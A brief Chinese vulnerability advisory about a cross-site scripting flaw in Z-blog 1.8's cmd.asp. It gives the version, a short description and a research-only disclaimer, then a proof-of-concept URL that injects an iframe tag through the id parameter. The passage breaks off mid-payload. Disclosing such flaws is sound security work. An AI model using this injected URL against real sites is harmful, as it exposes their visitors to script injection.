Z-blog 1.8 cmd.asp xss跨站漏洞

    漏洞版本:Z-blog 1.8漏洞描述:Zblog是基于Asp平台的Blog博客(网志)程序cmd.asp在对用户提交数据处理上存在安全漏洞<* 参考*>测试方法:本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!http://blog.rainbowsoft.org/cmd.asp?act=gettburl&id=10"><ifram